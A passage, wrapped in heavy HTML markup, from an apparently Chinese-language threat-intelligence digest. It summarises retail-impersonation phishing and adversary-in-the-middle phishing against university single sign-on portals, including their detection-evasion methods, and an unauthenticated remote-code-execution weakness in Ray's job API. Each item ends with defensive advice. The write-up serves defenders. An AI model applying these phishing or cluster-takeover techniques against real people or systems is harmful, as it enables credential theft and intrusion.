0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">04</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">借“黑五”购物季，冒充知名零售商发动定向钓鱼行动</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jfbe92df"><span leaf="">攻击方式关键词：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">钓鱼攻击（T1566）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8jfbe912l2" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">情报来源：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/black-friday-brand-impersonation-scams/" target="_blank">https://www.hendryadrian.com/black-friday-brand-impersonation-scams/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jfbe9u5k" style="font-size: 14px;">2025 年 11 月黑色星期五促销期间，攻击者借营销热潮发起精准钓鱼攻击，伪装知名零售品牌，以逼真仿冒邮件和紧迫感优惠主题吸引受众。攻击利用新注册的短暂域名，搭配复杂重定向链路及云存储平台隐藏链接，规避传统安全检测，同时通过心理操控诱导用户点击，意图窃取敏感凭证或植入恶意软件，展现出攻击者在域名操作和邮件设计上的专业性，也反映出购物高峰期利用消费者信任实施大规模钓鱼的趋势。多款异常检测系统通过识别异常发件人、短暂域名及隐蔽链接，成功拦截多起攻击。此类攻击可能导致用户凭证泄露、恶意软件植入，危害账户安全与数据隐私，增加财务及品牌信任风险。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jfbe9191w" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigjhckvru" style="font-size: 14px;">企业在促销高峰期间强化用户安全意识，严格核查邮件链接与附件，部署基于异常检测的邮件安全系统，实时监控新注册短暂域名和隐藏链接，动态更新防护策略。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigs0671rar"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, &#34;PingFang SC&#34;;font-weight: bold;color: rgb(0, 0, 0);line-height: 22px;text-align: left;" data-mid=""><span leaf="" mpa-font-style="md8m9c40qpa" style="font-size: 32px;" data-mpa-action-id="md8m9c51feg" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">05</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">定制化钓鱼邮件结合短链伪装技术绕过防护窃取用户凭证</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jgv1e12ce"><span leaf="">攻击方式关键词：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">混淆文件或信息（T1027）、代理（T1090）、窃取网络会话 Cookie（T1539）、中间人攻击（T1557）、钓鱼（T1566）、获取基础设施（T1583）</span></span></p></li><li><p><span mpa-font-style="md8jgv1e17rl" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">情报来源：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/dns-uncovers-infrastructure-used-in-sso-attacks/" target="_blank">https://www.hendryadrian.com/dns-uncovers-infrastructure-used-in-sso-attacks/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jgv1ev8f" style="font-size: 14px;">一名威胁行为者利用先进中间人钓鱼框架，针对多所高校学生的单点登录门户发起攻击。2025 年 4 月至 11 月期间，攻击者通过个性化邮件发送含短链接的内容，诱骗受害者点击跳转至伪造登录页面，进而窃取登录凭证与会话 Cookie。攻击中使用的钓鱼 URL 动态生成，以模仿合法服务的子域名和短效 URI 伪装，还借助代理隐藏真实 IP，搭配通配符 TLS 证书、Bot 过滤、诱导性页面及 JavaScript 混淆等多重技术规避检测。研究人员通过相关技术分析，发现近 70 个关联域名和多个专用 IP，为追踪攻击活动提供了支持。此次攻击展现了现代钓鱼攻击结合先进规避手段的复杂性与高效性，可能导致学生登录凭证泄露，使攻击者获得未授权访问权限，对相关高校信息安全构成重大风险。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jgv1e1i81" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigs05r1tnb" style="font-size: 14px;">立即封锁已知钓鱼域名和 IP，采用 DNS 检测、加强单点登录行为实时监控，强化多因素认证流程并定期更新安全策略，防范类似攻击。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, &#34;PingFang SC&#34;;font-weight: bold;color: rgb(34, 44, 255);line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px rgb(34, 44, 255);text-align: left;" data-mid=""><span leaf="">03</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8incu1uzj" style="font-size: 20px;" data-mpa-action-id="md8incuv1bwi" data-pm-slice="0 0 []">重点漏洞情报</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m951ldxp" style="font-size: 32px;" data-mpa-action-id="md8m952lbd3" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Anyscale Ray 远程代码执行漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-34351）</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 76, 65);">严重</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: left;"><span leaf=""><a href="https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-w8vc-465m-jjw6" target="_blank">https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-w8vc-465m-jjw6</a></span></span></p><p><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://docs.ray.io/en/latest/ray-security/token-auth.html" target="_blank">https://docs.ray.io/en/latest/ray-security/token-auth.html</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">Anyscale Ray 是一个统一分布式计算框架，其核心价值在于通过简洁的 Python API 让开发者能轻松地将人工智能与 Python 应用从单机扩展至大规模集群，而无需关注底层基础设施的复杂性。该框架基于动态任务执行引擎，统一了角色并行和任务并行计算，特别擅长管理机器学习工作流中的多节点、多 GPU 协调任务，例如大规模数据处理、分布式模型训练、超参数调优以及模型服务部署，从而显著提升了 AI 应用的开发效率和资源利用率。Anyscale Ray &lt;=2.52.0 的默认配置存在安全隐患，除非显式启用（通过设置 RAY_AUTH_MODE=token），否则 Ray 管理接口（包括仪表盘和作业 API）的基于令牌的身份验证功能将被禁用。在默认的未认证状态下，远程攻击者可以通过网络访问这些接口，从而提交作业并在 Ray 集群上执行任意代码。注意：供应商计划在未来的版本中默认启用令牌身份验证。他们建议启用令牌身份验证，以保护您的集群免受未经授权的访问。</span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 